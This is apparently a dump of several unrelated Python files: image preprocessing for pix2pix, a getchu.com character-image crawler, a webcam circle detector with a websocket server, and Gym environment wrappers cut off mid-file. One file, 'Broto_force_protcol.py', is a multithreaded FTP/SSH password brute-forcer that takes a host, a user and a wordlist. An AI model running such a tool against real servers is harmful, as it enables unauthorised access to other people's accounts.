if __name__ == '__main__':
t_lst = []
for _ in range(4):
t = Thread(target=send_request, args=('127.0.0.1', 8000))
t_lst.append(t)
t.start()
for t in t_lst:
t.join()
|
process.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import tempfile
import subprocess
import tensorflow as tf
import numpy as np
import tfimage as im
import threading
import time
import multiprocessing
edge_pool = None
tf.logging.set_verbosity(tf.logging.ERROR)
parser = argparse.ArgumentParser()
parser.add_argument("--input_dir", required=True, help="path to folder containing images")
parser.add_argument("--output_dir", required=True, help="output path")
parser.add_argument("--operation", required=True, choices=["grayscale", "resize", "blank", "combine", "edges"])
parser.add_argument("--workers", type=int, default=1, help="number of workers")
# resize
parser.add_argument("--pad", action="store_true", help="pad instead of crop for resize operation")
parser.add_argument("--size", type=int, default=256, help="size to use for resize operation")
# combine
parser.add_argument("--b_dir", type=str, help="path to folder containing B images for combine operation")
a = parser.parse_args()
def resize(src):
height, width, _ = src.shape
dst = src
if height != width:
if a.pad:
size = max(height, width)
# pad to correct ratio
oh = (size - height) // 2
ow = (size - width) // 2
dst = im.pad(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
else:
# crop to correct ratio
size = min(height, width)
oh = (height - size) // 2
ow = (width - size) // 2
dst = im.crop(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
assert(dst.shape[0] == dst.shape[1])
size, _, _ = dst.shape
if size > a.size:
dst = im.downscale(images=dst, size=[a.size, a.size])
elif size < a.size:
dst = im.upscale(images=dst, size=[a.size, a.size])
return dst
def blank(src):
height, width, _ = src.shape
if height != width:
raise Exception("non-square image")
image_size = width
size = int(image_size * 0.3)
offset = int(image_size / 2 - size / 2)
dst = src
dst[offset:offset + size,offset:offset + size,:] = np.ones([size, size, 3])
return dst
def combine(src, src_path):
if a.b_dir is None:
raise Exception("missing b_dir")
# find corresponding file in b_dir, could have a different extension
basename, _ = os.path.splitext(os.path.basename(src_path))
for ext in [".png", ".jpg"]:
sibling_path = os.path.join(a.b_dir, basename + ext)
if os.path.exists(sibling_path):
sibling = im.load(sibling_path)
break
else:
raise Exception("could not find sibling image for " + src_path)
# make sure that dimensions are correct
height, width, _ = src.shape
if height != sibling.shape[0] or width != sibling.shape[1]:
raise Exception("differing sizes")
# convert both images to RGB if necessary
if src.shape[2] == 1:
src = im.grayscale_to_rgb(images=src)
if sibling.shape[2] == 1:
sibling = im.grayscale_to_rgb(images=sibling)
# remove alpha channel
if src.shape[2] == 4:
src = src[:,:,:3]
if sibling.shape[2] == 4:
sibling = sibling[:,:,:3]
return np.concatenate([src, sibling], axis=1)
def grayscale(src):
return im.grayscale_to_rgb(images=im.rgb_to_grayscale(images=src))
net = None
def run_caffe(src):
# lazy load caffe and create net
global net
if net is None:
# don't require caffe unless we are doing edge detection
os.environ["GLOG_minloglevel"] = "2" # disable logging from caffe
import caffe
# using this requires using the docker image or assembling a bunch of dependencies
# and then changing these hardcoded paths
net = caffe.Net("/opt/caffe/examples/hed/deploy.prototxt", "/opt/caffe/hed_pretrained_bsds.caffemodel", caffe.TEST)
net.blobs["data"].reshape(1, *src.shape)
net.blobs["data"].data[...] = src
net.forward()
return net.blobs["sigmoid-fuse"].data[0][0,:,:]
def edges(src):
# based on https://github.com/phillipi/pix2pix/blob/master/scripts/edges/batch_hed.py
# and https://github.com/phillipi/pix2pix/blob/master/scripts/edges/PostprocessHED.m
import scipy.io
src = src * 255
border = 128 # put a padding around images since edge detection seems to detect edge of image
src = src[:,:,:3] # remove alpha channel if present
src = np.pad(src, ((border, border), (border, border), (0,0)), "reflect")
src = src[:,:,::-1]
src -= np.array((104.00698793,116.66876762,122.67891434))
src = src.transpose((2, 0, 1))
# [height, width, channels] => [batch, channel, height, width]
fuse = edge_pool.apply(run_caffe, [src])
fuse = fuse[border:-border, border:-border]
with tempfile.NamedTemporaryFile(suffix=".png") as png_file, tempfile.NamedTemporaryFile(suffix=".mat") as mat_file:
scipy.io.savemat(mat_file.name, {"input": fuse})
octave_code = r"""
E = 1-load(input_path).input;
E = imresize(E, [image_width,image_width]);
E = 1 - E;
E = single(E);
[Ox, Oy] = gradient(convTri(E, 4), 1);
[Oxx, ~] = gradient(Ox, 1);
[Oxy, Oyy] = gradient(Oy, 1);
O = mod(atan(Oyy .* sign(-Oxy) ./ (Oxx + 1e-5)), pi);
E = edgesNmsMex(E, O, 1, 5, 1.01, 1);
E = double(E >= max(eps, threshold));
E = bwmorph(E, 'thin', inf);
E = bwareaopen(E, small_edge);
E = 1 - E;
E = uint8(E * 255);
imwrite(E, output_path);
"""
config = dict(
input_path="'%s'" % mat_file.name,
output_path="'%s'" % png_file.name,
image_width=256,
threshold=25.0/255.0,
small_edge=5,
)
args = ["octave"]
for k, v in config.items():
args.extend(["--eval", "%s=%s;" % (k, v)])
args.extend(["--eval", octave_code])
try:
subprocess.check_output(args, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
print("octave failed")
print("returncode:", e.returncode)
print("output:", e.output)
raise
return im.load(png_file.name)
def process(src_path, dst_path):
src = im.load(src_path)
if a.operation == "grayscale":
dst = grayscale(src)
elif a.operation == "resize":
dst = resize(src)
elif a.operation == "blank":
dst = blank(src)
elif a.operation == "combine":
dst = combine(src, src_path)
elif a.operation == "edges":
dst = edges(src)
else:
raise Exception("invalid operation")
im.save(dst, dst_path)
complete_lock = threading.Lock()
start = None
num_complete = 0
total = 0
def complete():
global num_complete, rate, last_complete
with complete_lock:
num_complete += 1
now = time.time()
elapsed = now - start
rate = num_complete / elapsed
if rate > 0:
remaining = (total - num_complete) / rate
else:
remaining = 0
print("%d/%d complete %0.2f images/sec %dm%ds elapsed %dm%ds remaining" % (num_complete, total, rate, elapsed // 60, elapsed % 60, remaining // 60, remaining % 60))
last_complete = now
def main():
if not os.path.exists(a.output_dir):
os.makedirs(a.output_dir)
src_paths = []
dst_paths = []
skipped = 0
for src_path in im.find(a.input_dir):
name, _ = os.path.splitext(os.path.basename(src_path))
dst_path = os.path.join(a.output_dir, name + ".png")
if os.path.exists(dst_path):
skipped += 1
else:
src_paths.append(src_path)
dst_paths.append(dst_path)
print("skipping %d files that already exist" % skipped)
global total
total = len(src_paths)
print("processing %d files" % total)
global start
start = time.time()
if a.operation == "edges":
# use a multiprocessing pool for this operation so it can use multiple CPUs
# create the pool before we launch processing threads
global edge_pool
edge_pool = multiprocessing.Pool(a.workers)
if a.workers == 1:
with tf.Session() as sess:
for src_path, dst_path in zip(src_paths, dst_paths):
process(src_path, dst_path)
complete()
else:
# list() so the pairs form a proper tensor under Python 3, where zip() is lazy
queue = tf.train.input_producer(list(zip(src_paths, dst_paths)), shuffle=False, num_epochs=1)
dequeue_op = queue.dequeue()
def worker(coord):
with sess.as_default():
while not coord.should_stop():
try:
src_path, dst_path = sess.run(dequeue_op)
except tf.errors.OutOfRangeError:
coord.request_stop()
break
process(src_path, dst_path)
complete()
# init epoch counter for the queue
local_init_op = tf.local_variables_initializer()
with tf.Session() as sess:
sess.run(local_init_op)
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
for i in range(a.workers):
t = threading.Thread(target=worker, args=(coord,))
t.start()
threads.append(t)
try:
coord.join(threads)
except KeyboardInterrupt:
coord.request_stop()
coord.join(threads)
main()
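# Example invocations (paths are hypothetical; flags are the ones defined above):
#   python process.py --input_dir photos --output_dir out --operation resize --size 256
#   python process.py --input_dir a --b_dir b --output_dir ab --operation combine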
|
getchu_grab_info.py
|
'''
getchu character-image crawler
Dataset layout:
dataset/
company.html
dataset/id2name.json
dataset/list.html
dataset/company_id/
dataset/company_id/id2name.json
dataset/company_id/product_id/
dataset/company_id/product_id/<character main image>.jpg
dataset/company_id/product_id/<character full-body image>.jpg
dataset/company_id/product_id/data.json
dataset/company_id/product_id/soft.html
*.html files are the raw page data and also serve as a cache
data.json contents
<chara>
----<chara_name>
--------<main_pic_name>
--------<main_pic_link>
--------<full_pic_name>
--------<full_pic_link>
# Character descriptions turned out to be of no use, so they were dropped
#--------<chara_comment>
#--------<cv>
<product>
----<cover_pic_name>
----<cover_pic_link>
----<painter>
----<release_date>
# Scenario and music credits are not generic enough and of little use, so they were dropped
#----<scenario>
#----<composer>
'''
from bs4 import BeautifulSoup
import requests
from requests.adapters import HTTPAdapter
import re
import os
import json
import urllib.parse
import time
import queue
from threading import Thread
# -----------------------------------------------------------
# Parameters
# These flags control cache usage. Set a flag to False to ignore that cache; normally only auto_use_stage1_cache and auto_use_stage2_cache need to be set to False.
auto_use_stage1_cache = True
auto_use_stage2_cache = True
auto_use_stage3_cache = True
# Interval between successive requests
req_interval = 0.3
# Number of retries
retries = 20
# Timeout in seconds
timeout = 10
# Whether to use a proxy (required from mainland China)
use_proxy = True
# Proxy address; oddly enough, this SOCKS5 proxy can be reached via the http scheme
proxies = {
'http': 'http://127.0.0.1:1080',
'https': 'http://127.0.0.1:1080'
}
# -----------------------------------------------------------
if not use_proxy:
proxies = {}
# The defaults are fine
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'}
# Cookie flag that grants access to certain (age-gated) pages
cookies = {'getchu_adalt_flag': 'getchu.com'}
# Currently only used to build absolute URLs
web_root = 'http://www.getchu.com'
def step1_get_companies_list(html):
'''
Given the index page, parse out the product-search link, company name and company ID.
:param html:
:return: [[products_search_link, company_name, company_id], ...]
'''
# Dig these out directly with a regular expression
companies_link_name = re.findall(r'<a href="(http://www\.getchu\.com/php/search\.phtml\?search_brand_id=\d+)">(.+?)</a>', html, re.I)
companies_link_name_id = []
for link, name in companies_link_name:
# id_ = link[link.rfind('=')+1:]
# Extract the id from the link
id_ = None
params = urllib.parse.splitquery(link)[1].split('&')
for p in params:
ps = p.split('=')
if ps[0] == 'search_brand_id':
id_ = ps[1]
break
companies_link_name_id.append([link, name, id_])
return companies_link_name_id
def step2_get_products_list(html):
'''
Given a product-search page, return product names, links and IDs.
:param html:
:return: [[product_link, product_name, product_id], ...]
'''
# Dig these out directly with a regular expression
products_link_name = re.findall(r'<a href="\.\.(/soft\.phtml\?id=\d+)" class="blueb">(.+?)</a>', html, re.I)
products_link_name_id = []
for link, name in products_link_name:
# id_ = link[link.rfind('=')+1:]
# Extract the id from the link
id_ = None
params = urllib.parse.splitquery(link)[1].split('&')
for p in params:
ps = p.split('=')
if ps[0] == 'id':
id_ = ps[1]
break
products_link_name_id.append([web_root+link, name, id_])
return products_link_name_id
def step3_get_product_info(html):
'''
Given a product page, return a dict containing
character names, image names, image links, the product name, the artist, etc.
:param html:
:return: {'chara': ... , 'product': ...}
'''
data = {'chara': {}, 'product': {}}
# Check whether the page has a character section
# If there is none, skip this product
if html.find(';キャラクター</div>') != -1:
soup = BeautifulSoup(html, 'lxml')
tags = soup.select('table')
# Header table
head_tag = soup.find_all('table', {'id': 'soft_table'})[0]
# First look for the cover image
## No distinctive markup was found for it, so it is currently located by position
# Some products do not even have a cover...
cover_tag = head_tag.find_all('td', {'rowspan': 2})[0]
_some_tags = re.findall(r'href="\.(/\w+?/\w+?/[\w.]+?)"', str(cover_tag), re.I)
if len(_some_tags) > 0:
cover_pic_link = _some_tags[0]
cover_pic_link = web_root + cover_pic_link
data['product']['cover_pic_link'] = cover_pic_link
data['product']['cover_pic_name'] = cover_pic_link[cover_pic_link.rfind('/')+1:]
else:
data['product']['cover_pic_link'] = None
data['product']['cover_pic_name'] = None
# With no cover, character images are even less likely to exist; this product could simply be skipped
# Keep it for now anyway
# return None
# Next find the original artist, dug out with a regex
# Of course, there may be no artist credit at all...
try:
painter = re.findall(r'\n原画:(.+?)\n', head_tag.text, re.I)[0]
painter = painter.split('、')
except IndexError:
painter = ''
data['product']['painter'] = painter
# Find the release date
try:
release_date = re.findall(r'発売日:\s*(\d+/\d+/\d+)\s', head_tag.text, re.I)[0]
except IndexError:
release_date = ''
data['product']['release_date'] = release_date
# Character description section
chara_tags = None
# Find which table is the character section
for t in tags:
if str(t).find('chara-name') != -1:
chara_tags = t
break
wait_to_check_chara_tags = chara_tags.select('tr')
# Rows that contain the string chara-name are character rows; the rest are placeholder rows
chara_tags = []
for t in wait_to_check_chara_tags:
if str(t).find('chara-name') != -1:
chara_tags.append(t)
# print('Found {} chara'.format(len(chara_tags)))
# Break each character row into its component parts
for chara_tag in chara_tags:
_l = chara_tag.select('td')
# The full-body image is not always present
chara_full_pic_tag = None
if len(_l) == 3:
# This row has: main image, description, full-body image
chara_main_pic_tag, chara_content_tag, chara_full_pic_tag = _l
elif len(_l) == 2:
# This row only has: main image, description
chara_main_pic_tag, chara_content_tag = _l
else:
# Products such as id 1017496 have a different layout; just skip them
return None
# # The page structure has changed
# raise AssertionError('Re-check the page; its structure has changed')
chara_main_pic_link = chara_name = chara_full_pic_link = None
# Handle the character main image
if chara_main_pic_tag is not None:
# Some characters have no image at all...
try:
# Dig the image link out directly with a regex
chara_main_pic_link = re.findall(r'src="\.(/\w+?/\w+?/[\w.]+?)"', str(chara_main_pic_tag), re.I)[0]
# Prepend the site prefix
chara_main_pic_link = web_root + chara_main_pic_link
except:
pass
# Handle the character name
if chara_content_tag is not None:
chara_name_tag = chara_content_tag.select('h2', {'class': 'chara-name'})[0]
# Character-name handling is a bit involved
# Ideally the title would be stripped; some characters have one, e.g. Naruse Shiroha's title "the girl who forgot her summer vacation"
# In some products the name and the CV are split across two lines, which would need two lines here
# Extracting only the bare name is too fiddly, so give up and keep the title and the rest as well
# The block below is disabled
# chara_name = str(chara_name_tag.contents[-2]) + str(chara_name_tag.contents[-1])
# # A typical character-name line looks like "鳴瀨 しろは(なるせ しろは) CV:小原好美"
# # First look for a parenthesis and cut there; otherwise look for "CV:" and cut there; if neither is found, the whole string is the name
# # Note that full-width characters must be used
# _pos = chara_name.find('(')
# if _pos == -1:
# _pos = chara_name.find('CV:')
#
# if _pos == -1:
# _pos = None
# chara_name = chara_name[:_pos]
# Strip extra spaces around the character name, but keep the spaces inside it
chara_name = chara_name_tag.text
# Well, there are even characters whose name is a single space... product ID 27393
# so the line below is disabled..
# chara_name = chara_name.strip()
if len(chara_name) == 0:
raise AssertionError('Found chara name is empty!')
# Handle the character full-body image
if chara_full_pic_tag is not None:
# Same trick: dig the link out with a regex
chara_full_pic_link = re.findall(r'href="\.(/\w+?/\w+?/[\w.]+?)"', str(chara_full_pic_tag), re.I)[0]
chara_full_pic_link = web_root + chara_full_pic_link
# print(chara_main_pic_link, chara_name, chara_full_pic_link)
# Add it to the result table
chara_main_pic_name = chara_full_pic_name = None
if chara_main_pic_link is not None:
chara_main_pic_name = chara_main_pic_link[chara_main_pic_link.rfind('/')+1:]
if chara_full_pic_link is not None:
chara_full_pic_name = chara_full_pic_link[chara_full_pic_link.rfind('/')+1:]
data['chara'][chara_name] = {'chara_main_pic_name': chara_main_pic_name, 'chara_main_pic_link': chara_main_pic_link,
'chara_full_pic_name': chara_full_pic_name, 'chara_full_pic_link': chara_full_pic_link}
return data
else:
return None
company_id2name = {}
def download(link, path):
'''
Download a link to a file.
:param link: the download link
:param path: path of the destination file (None to skip writing)
:return: (status_code, content)
'''
s = requests.Session()
s.mount('http://', HTTPAdapter(max_retries=retries))
s.mount('https://', HTTPAdapter(max_retries=retries))
try:
r = s.get(link, timeout=timeout, headers=headers, cookies=cookies, proxies=proxies, verify=False)
except (requests.ConnectionError, requests.Timeout):
return None, None
if r.status_code == 200:
if path is not None:
open(path, 'wb').write(r.content)
return r.status_code, r.content
else:
print('Download link {} failure status_code {}.'.format(link, r.status_code))
return r.status_code, None
if __name__ == '__main__':
# Initialise the session
s = requests.Session()
s.mount('http://', HTTPAdapter(max_retries=retries))
s.mount('https://', HTTPAdapter(max_retries=retries))
dataset_root = 'dataset'
os.makedirs(dataset_root, exist_ok=True)
# stage1
print('stage 1')
# Check whether a cached company list already exists
print('Getting company list')
complete_mark = os.path.join(dataset_root, '.complete')
company_list_html_path = os.path.join(dataset_root, 'company.html')
if os.path.isfile(complete_mark) and auto_use_stage1_cache:
print('Use cache')
else:
# Remove the completion mark first to avoid an inconsistent partial state
if os.path.isfile(complete_mark):
os.remove(complete_mark)
code = None
try_count = 0
while code != 200 and try_count < retries:
# Fetch the company list
code, _ = download('http://www.getchu.com/all/brand.html?genre=pc_soft', company_list_html_path)
time.sleep(req_interval)
try_count += 1
if code != 200:
raise AttributeError('Download company list html failure with retry {} status_code {}'.format(try_count, code))
# Create the completion mark
open(complete_mark, 'wb')
f = open(company_list_html_path, 'rb').read().decode('EUC-JP', errors='replace')
# Parse out the company links and names
companies_link_name_id = step1_get_companies_list(f)
#
n_company = len(companies_link_name_id)
# stage2
# There are only about 2100 companies, so no multithreading here
print('stage 2')
# Save the search pages
for n_id, (company_link, company_name, company_id) in enumerate(companies_link_name_id):
print('({}/{}) Getting company product list. Company name&id: ({}/{})'.format(n_id+1, n_company, company_name, company_id))
# Record the id -> company-name mapping
company_id2name[company_id] = company_name
# Use the id as the folder name
company_dir = os.path.join(dataset_root, company_id)
# Create the company folder
os.makedirs(company_dir, exist_ok=True)
complete_mark = os.path.join(company_dir, '.complete')
# Path of the product-list file
product_list_html_path = os.path.join(company_dir, 'list.html')
if os.path.isfile(complete_mark) and auto_use_stage2_cache:
print('Use cache')
else:
s = requests.Session()
s.mount('http://', HTTPAdapter(max_retries=retries))
s.mount('https://', HTTPAdapter(max_retries=retries))
# Remove the completion mark first to avoid an inconsistent partial state
if os.path.isfile(complete_mark):
os.remove(complete_mark)
# Add query parameters so that all products are shown on a single page
# Limit to at most 5000 products and to PC games only
# A date range could also be added with &start_year=2005&start_month=1&start_day=1&end_year=2025&end_month=12&end_day=30
new_company_link = company_link + '&list_count=5000' + '&genre=pc_soft'
code = None
try_count = 0
while code != 200 and try_count < retries:
# Fetch the product list
code, _ = download(new_company_link, product_list_html_path)
time.sleep(req_interval)
try_count += 1
if code != 200:
print('Download product list html failure with status_code {}, will be retry.'.format(code))
if code != 200:
raise AttributeError(
'Download product list html failure with retry {} status_code {}'.format(try_count, code))
# print('{} done'.format(company_name))
# Set the completion mark to avoid reprocessing
open(complete_mark, 'wb')
# Save the company id -> name mapping
json.dump(company_id2name, open(os.path.join(dataset_root, 'id2name.json'), 'w', encoding='utf8'))
# stage3
print('stage 3')
# There are too many pages, so downloading and processing are split into separate passes; if a fetch fails, restarting does not waste much time
# Download with multiple threads
n_thread = 4
n_failure = 0
no_more = False
command_quene = queue.Queue(maxsize=n_thread)
worker_threads = []
def stage3_download(complete_mark, product_link, product_dir):
# Remove the completion mark first to avoid an inconsistent partial state
if os.path.isfile(complete_mark):
os.remove(complete_mark)
# Download and save the product page; on a 500 response this retries immediately instead of skipping
code = None
try_count = 0
while code != 200 and try_count < retries:
# Fetch the product page
code, _ = download(product_link, os.path.join(product_dir, 'soft.html'))
time.sleep(req_interval)
try_count += 1
if code != 200:
print('Download product info html failure with status_code {}, will be retry.'.format(code))
if code != 200:
print('Download product info html failure with retry {} status_code {}.'.format(try_count, code))
return False
# Set the completion mark to avoid reprocessing
open(complete_mark, 'wb')
return True
def stage3_worker_run():
global n_failure
while True:
try:
new_cmd = command_quene.get(block=True, timeout=2)
except queue.Empty:
if no_more and command_quene.empty():
break
continue
b = stage3_download(*new_cmd)
if not b:
n_failure += 1
# Start the worker threads
for _ in range(n_thread):
t = Thread(target=stage3_worker_run)
t.start()
worker_threads.append(t)
# Download the pages
for n_id, (company_link, company_name, company_id) in enumerate(companies_link_name_id):
company_dir = os.path.join(dataset_root, company_id)
t2 = open(os.path.join(company_dir, 'list.html'), 'rb').read().decode('EUC-JP', errors='replace')
# Product links, names and ids
products_link_name_id = step2_get_products_list(t2)
product_id2name = {}
n_product = len(products_link_name_id)
for n2_id, (product_link, product_name, product_id) in enumerate(products_link_name_id):
print('({}/{}) ({}/{}) Getting product info. Product name&id: ({}/{}) Company name&id: ({}/{})'.
format(n_id+1, n_company, n2_id+1, n_product, product_name, product_id, company_name, company_id))
# Record the product id -> name mapping
product_id2name[product_id] = product_name
product_dir = os.path.join(dataset_root, company_id, product_id)
# Create the product folder
os.makedirs(product_dir, exist_ok=True)
complete_mark = os.path.join(product_dir, '.complete')
if os.path.isfile(complete_mark) and auto_use_stage3_cache:
print('Use cache')
else:
# This part is sped up with multithreading
# # Remove the completion mark first to avoid an inconsistent partial state
# if os.path.isfile(complete_mark):
# os.remove(complete_mark)
# # Download and save the product page
# r = s.get(product_link, timeout=10, cookies=cookies, proxies=proxies, verify=False)
# time.sleep(req_interval)
# # print(r.status_code)
# if r.status_code != 200:
# print(r.status_code)
# raise AssertionError('download html failure')
# open(os.path.join(product_dir, 'soft.html'), 'wb').write(r.content)
# # Set the completion mark to avoid reprocessing
# open(complete_mark, 'wb')
command_quene.put([complete_mark, product_link, product_dir], block=True)
# download(complete_mark, product_link, product_dir)
no_more = True
print('waiting for workers to quit')
for t in worker_threads:
t.join()
# Check the failure count; abort if it is non-zero, because everything must be downloaded before the next stage
if n_failure > 0:
print('n_failure', n_failure)
raise AssertionError('Found n_failure > 0, please restart download')
# Parse the pages and extract the data
for n_id, (company_link, company_name, company_id) in enumerate(companies_link_name_id):
company_dir = os.path.join(dataset_root, company_id)
t2 = open(os.path.join(company_dir, 'list.html'), 'rb').read().decode('EUC-JP', errors='replace')
# Product links, names and ids
products_link_name_id = step2_get_products_list(t2)
product_id2name = {}
n_product = len(products_link_name_id)
for n2_id, (product_link, product_name, product_id) in enumerate(products_link_name_id):
print('({}/{}) ({}/{}) Generating product info. Product name&id: ({}/{}) Company name&id: ({}/{})'.
format(n_id + 1, n_company, n2_id + 1, n_product, product_name, product_id, company_name,
company_id))
# Record the product id -> name mapping
product_id2name[product_id] = product_name
product_dir = os.path.join(dataset_root, company_id, product_id)
t3 = open(os.path.join(product_dir, 'soft.html'), 'rb').read().decode('EUC-JP', errors='replace')
data = step3_get_product_info(t3)
if data is not None:
json.dump(data, open(os.path.join(product_dir, 'data.json'), 'w', encoding='utf8'))
# Save the product id -> game-name mapping
json.dump(product_id2name, open(os.path.join(dataset_root, company_id, 'id2name.json'), 'w', encoding='utf8'))
print('Success')
|
circle_detection_with_websocket_server.py
|
import cv2
import numpy as np
import threading
import json
from SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
server = None
clients = []
class SimpleWSServer(WebSocket):
def handleConnected(self):
clients.append(self)
def handleClose(self):
clients.remove(self)
def run_server():
global server
server = SimpleWebSocketServer('', 9000, SimpleWSServer,
selectInterval=(1000.0 / 15) / 1000)
server.serveforever()
t = threading.Thread(target=run_server)
t.start()
capture = cv2.VideoCapture(0)
t = 100
w = 640.0
last = 0
while True:
ret, image = capture.read()
img_height, img_width, depth = image.shape
scale = w / img_width
h = img_height * scale
image = cv2.resize(image, (0,0), fx=scale, fy=scale)
# Apply filters
grey = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blured = cv2.medianBlur(grey, 9)
# Compose 2x2 grid with all previews
ih, iw = image.shape[:2]  # integer dimensions of the resized frame, for indexing
grid = np.zeros([2 * ih, 2 * iw, 3], np.uint8)
grid[0:ih, 0:iw] = image
# We need to convert each of them to RGB from greyscale 8 bit format
grid[ih:2 * ih, 0:iw] = np.dstack([cv2.Canny(grey, t / 2, t)] * 3)
grid[0:ih, iw:2 * iw] = np.dstack([blured] * 3)
grid[ih:2 * ih, iw:2 * iw] = np.dstack([cv2.Canny(blured, t / 2, t)] * 3)
cv2.imshow('Image previews', grid)
sc = 1   # dp: inverse ratio of the accumulator resolution
md = 30  # minimum distance between detected circle centres
at = 40  # accumulator threshold for circle detection
# Pass the thresholds as keyword arguments; positionally the fifth argument is the
# optional output array, not param1.
circles = cv2.HoughCircles(blured, cv2.HOUGH_GRADIENT, sc, md, param1=t, param2=at)
if circles is not None:
# We care only about the first circle found.
circle = circles[0][0]
x, y, radius = int(circle[0]), int(circle[1]), int(circle[2])
print(x / w, y / h, radius / w)
# Highlight the circle
cv2.circle(image, (x, y), radius, (0, 0, 255), 1)
# Draw dot in the center
cv2.circle(image, (x, y), 1, (0, 0, 255), 1)
for client in clients:
client.sendMessage(unicode(json.dumps({'x': x / w, 'y': y / h, 'radius': radius / w})))
cv2.imshow('Image with detected circle', image)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
server.close()
|
Broto_force_protcol.py
|
from colored import fg, bg, attr
import colored
import socket as sock
from Modules import intro
import ftplib
from threading import Thread
import queue
import logging
import paramiko
logging.disable(logging.CRITICAL)
class Brute_Force:
global q
q = queue.Queue()
def __init__(self):
#self.q = queue.Queue()
self.angry1 = colored.fg("green") + colored.attr("bold")
self.angry2 = colored.fg("red") + colored.attr("bold")
self.angry = colored.fg("white") + colored.attr("bold")
print(f"""{self.angry1}
1 - FTP Brute
2 - SSH Brute
0 - back
""")
self.number = str(input("[?]>>"))
if self.number ==str(1) or "use ftp" in self.number :
self.host = str(input("HOST : "))
self.user = str(input("USER : "))
self.passwords = str(input("File : "))
self.passwords = open(self.passwords).read().split("\n")
self.threads = int(input("Threads : "))
print("[+] Passwords to try:", len(self.passwords))
for password in self.passwords:
q.put(password)
for t in range(self.threads):
self.thread = Thread(target=self.ftp_brute)
self.thread.daemon = True
self.thread.start()
if self.number ==str(2) or "use ssh" in self.number:
self.host = str(input("HOST : "))
self.user = str(input("USER : "))
self.passwords = str(input("File : "))
self.passwords = open(self.passwords).read().split("\n")
self.threads = int(input("Threads : "))
print("[+] Passwords to try:", len(self.passwords))
for password in self.passwords:
q.put(password)
for t in range(self.threads):
self.thread = Thread(target=self.ssh_brute)
self.thread.daemon = True
self.thread.start()
if self.number ==str(99) or "back" in self.number :
intro.main()
q.join()
def ftp_brute(self):
try :
while True :
password = q.get()
print(f"{self.angry2}[#] Trying",f"{self.user}:{password}")
try:
server = ftplib.FTP()
server.connect(self.host,port=21, timeout=5)
server.login(self.user, password)
except ftplib.error_perm:
pass
else:
print(f"{self.angry1}[+] Found Crack FTP: \n HOST : {self.host} \n Password : {password} {self.angry}")
with q.mutex:
q.queue.clear()
q.all_tasks_done.notify_all()
q.unfinished_tasks = 0
finally :
q.task_done()
except:
pass
def ssh_brute(self):
try :
while True :
password = q.get()
print(f"{self.angry2}[#] Trying",f"{self.user}:{password}")
try:
server = ftplib.FTP()
server.connect(self.host,port=21, timeout=5)
server.login(self.user, password)
except ftplib.error_perm:
pass
else:
print(f"{self.angry1}[+] Found Crack SSH: \n HOST : {self.host} \n Password : {password} {self.angry} ")
with q.mutex:
q.queue.clear()
q.all_tasks_done.notify_all()
q.unfinished_tasks = 0
finally :
q.task_done()
except :
pass
|
wrappers.py
|
# Copyright 2017 The TensorFlow Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrappers for OpenAI Gym environments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import functools
import multiprocessing
import sys
import traceback
import gym
import gym.spaces
import numpy as np
import tensorflow as tf
class AutoReset(object):
"""Automatically reset environment when the episode is done."""
def __init__(self, env):
self._env = env
self._done = True
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
if self._done:
observ, reward, done, info = self._env.reset(), 0.0, False, {}
else:
observ, reward, done, info = self._env.step(action)
self._done = done
return observ, reward, done, info
def reset(self):
self._done = False
return self._env.reset()
class ActionRepeat(object):
"""Repeat the agent action multiple steps."""
def __init__(self, env, amount):
self._env = env
self._amount = amount
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
done = False
total_reward = 0
current_step = 0
while current_step < self._amount and not done:
observ, reward, done, info = self._env.step(action)
total_reward += reward
current_step += 1
return observ, total_reward, done, info
class RandomStart(object):
"""Perform random number of random actions at the start of the episode."""
def __init__(self, env, max_steps):
self._env = env
self._max_steps = max_steps
def __getattr__(self, name):
return getattr(self._env, name)
def reset(self):
observ = self._env.reset()
random_steps = np.random.randint(0, self._max_steps)
for _ in range(random_steps):
action = self._env.action_space.sample()
observ, unused_reward, done, unused_info = self._env.step(action)
if done:
tf.logging.warning('Episode ended during random start.')
return self.reset()
return observ
class FrameHistory(object):
"""Augment the observation with past observations."""
def __init__(self, env, past_indices, flatten):
"""Augment the observation with past observations.
Implemented as a Numpy ring buffer holding the necessary past observations.
Args:
env: OpenAI Gym environment to wrap.
past_indices: List of non-negative integers indicating the time offsets
from the current time step of observations to include.
flatten: Concatenate the past observations rather than stacking them.
Raises:
KeyError: The current observation is not included in the indices.
"""
if 0 not in past_indices:
raise KeyError('Past indices should include 0 for the current frame.')
self._env = env
self._past_indices = past_indices
self._step = 0
self._buffer = None
self._capacity = max(past_indices)
self._flatten = flatten
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
low = self._env.observation_space.low
high = self._env.observation_space.high
low = np.repeat(low[None, ...], len(self._past_indices), 0)
high = np.repeat(high[None, ...], len(self._past_indices), 0)
if self._flatten:
low = np.reshape(low, (-1,) + low.shape[2:])
high = np.reshape(high, (-1,) + high.shape[2:])
return gym.spaces.Box(low, high)
def step(self, action):
observ, reward, done, info = self._env.step(action)
self._step += 1
self._buffer[self._step % self._capacity] = observ
observ = self._select_frames()
